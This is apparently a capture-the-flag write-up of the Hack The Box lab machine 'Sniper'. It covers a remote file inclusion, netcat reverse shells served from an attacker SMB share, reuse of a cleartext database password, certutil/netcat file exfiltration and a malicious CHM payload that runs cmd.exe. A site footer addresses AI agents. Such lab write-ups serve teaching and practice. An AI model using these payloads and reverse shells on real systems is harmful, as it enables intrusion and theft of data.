# Sniper

![Sniper](/files/-M3WZ1N3DC5YP7iHuC6x)

Sniper is a medium difficulty windows box that has web based exploits 

## Recon

We start off scanning Snipers IP `10.10.10.151` with `nmap`

```
nmap -T4 -A -v 10.10.10.151
```

From Our Results we get the following services and ports

```
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET POST
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
```

Here we find port 80 is open, which means it must be hosting a website, upon navigating to `10.10.10.151:80` we find exactly that

for the most part we find nothing exceptionally interesting except.. a particular url `http://10.10.10.151/blog/?lang=blog-en.php` the `?lang=` indicates that it may be vulnerable to `RFI` attacks but we have no way of getting a shell? Let's take a look at our nmap scan again, it seems SMB is also open, we can usue this to access a SMB Share of ours.

```
apt-get install samba
mkdir -r /tmp/sniper/smb
chmod 777 /tmp/sniper/smb
```

For the sake of anonymous access we'll have to make some changes to our SMB Config, we can find it at `/etc/samba/smb.conf` at the end of the file we'll have to add

```
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
```

Also due note that the `smb` folder has the correct permissions

For these changes to take effect we'll have to restart the smb service we can do this with `service smbd restart`

Windows doesn't natively come with `netcat` due to this we'll have to download it and host it ourselves we can get it from here <https://eternallybored.org/misc/netcat/> and place it in our smb share folder

once we have this, we should start a local `netcat` listener this can be done with

```
nc -lnvp 8888
ifconfig tun0 #get VPN IP
```

perfect we are ready to connect back to our machine from the target, now to trigger our `RFI` vulnerability

```
<?php $answer = system('\\\\10.10.15.32\\pizza\\nc.exe 10.10.15.32 8888 -e powershell.exe');echo $answer."</br>"; ?>
http://10.10.10.151/blog/?lang=\\10.10.15.32\pizza\pizza.php
```

once our session is up and running we can go around looking for ways to escalate privileges to a user shell. Looking into `C:/Users/` we find a user called `Chris`&#x20;

```
    Directory: C:\users                                                                                                                                               
                                                                                                                                                                      
                                                                                                                                                                      
Mode                LastWriteTime         Length Name                                                                                                                 
----                -------------         ------ ----                                                                                                                 
d-----         4/9/2019   6:47 AM                Administrator                                                                                                        
d-----        4/11/2019   7:04 AM                Chris                                                                                                                
d-r---         4/9/2019   6:47 AM                Public
```

since we have a site up we should check its host directory which in this case is `C:/inetpub/wwwroot` under this we find a directory called user and under it `db.php` in this we find a db connection with a password in clear text that being `36mEAhz/B8xQ~2VM` we can safely assume that this is the user credentials.

```
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>
```

Now we have user Creds, its time to login as user

## Exploit

We can locally escalate user via the credentials we have and execute our payload to do this on powershell we'll&#x20;

```
nc -lnvp 6464 #local listener
```

Huge thanks to @[3r3bu5](https://3r3bu5.github.io/) for this tip

```
$user = "sniper\Chris" save a variable for chris as user
$password = ConvertTo-SecureString "36mEAhz/B8xQ~2VM" -AsPlainText -Force #convert the password to a plain-text string into password variable
$credential = New-Object System.Management.Automation.PSCredential ($user, $password) #create a PS credentials object of chris and the db password
Invoke-Command -ComputerName localhost -ScriptBlock { \\\\10.10.14.170\\pizza\\nc.exe 10.10.14.32 6464 -e powershell.exe } -Credential $credential #run nc from our smb share in context of Chris
```

Now that we have Chris we can get our first flag

```
cd ../Desktop
cat user.txt
```

## Post Exploitation

Now that we have user we can dig around for root.

exploring `C:/` reveals a directory called `Docs` opening it gives us 2 files&#x20;

```
    Directory: C:\Docs


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/11/2019   9:31 AM            285 note.txt                                                              
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf
```

getting the output of `note.txt` shows us

```
Hi Chris,
        Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.
```

Yikes! looks like the CEO isn't to happy with us.

Let's continue Digging around. Checking the Downloads directory for Chris shows us a `instructions.chm` looks interesting lets swipe it and have a look

we can use `certutil` to encode the file in base64 and make it much easier to transfer for that we'll use

```
certutil -encode "instructions.chm" instructions.chm.txt
```

and to transfer it we'll use netcat yet again

```
nc -lp 1234 > instructions.chm.txt #on local
cat instructions.chm.txt | \\10.10.14.32\pizza\nc.exe -w 3 10.10.14.170 1234 #on target
```

now we can head over to windows to decode our `instructions.chm`

```
certutil -decode instructions.chm.txt instructions.chm
```

![](/files/-M3_wjeo5_L1DdybmQAF)

Yikes definetely a lot of bad blood here.

Fortunately it gives us a hint, going back to the CEO's note he noted that he was waiting for the documentation. Given Chris created this it stands to reason that the documentation was a `.chm` Googling around we find that we can exploit `chm!`

&#x20; Going back to windows we have to create CHM via [html help workshop ](https://www.google.com/url?sa=t\&rct=j\&q=\&esrc=s\&source=web\&cd=1\&cad=rja\&uact=8\&ved=2ahUKEwjRxp7LxL_oAhVLcBQKHfnNDy8QFjAAegQIARAB\&url=https%3A%2F%2Fwww.microsoft.com%2Fen-us%2Fdownload%2Fdetails.aspx%3Fid%3D21138\&usg=AOvVaw1_oaw66rS-7sanf8ov-cbb)

Once we have the workshop setup we need to create a new project in it. Once we've done that we need to create a html file which will have our payload which is

```
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe, /c typeC:\Users\Administrator\Desktop\root.txt > C:/pizza/root.txt,'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>
```

And edit the `.hhp` to include our malicious `html`

```
[OPTIONS]

[FILES]
Untitled1.htm
```

and compile, once you have your `chm` we can transfer it over to our victim. To do this we'll use `SimpleHTTPServer`

```
python -m SimpleHTTPServer 8088 #start server in the same directory as payload
Invoke-WebRequest http://10.10.14.32:8088/pizza.chm -OutFile C:/Temp/pizza.chm #Download Payload to machine
```

Great but now how do we get root? Well the CEO did also say to "drop it here" so lets copy our malicious `chm` to `C:\Docs` and hope for the best

```
cp pizza.chm C:\Docs\
```

And voila after a minute we should be having our root flag in `C:/Temp` or a session if you wanted it to be so.

## Useful Links

{% embed url="<https://attack.mitre.org/techniques/T1223/>" %}

{% embed url="<https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://bkr3257.gitbook.io/hackynotes/htb-writeups/sniper.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.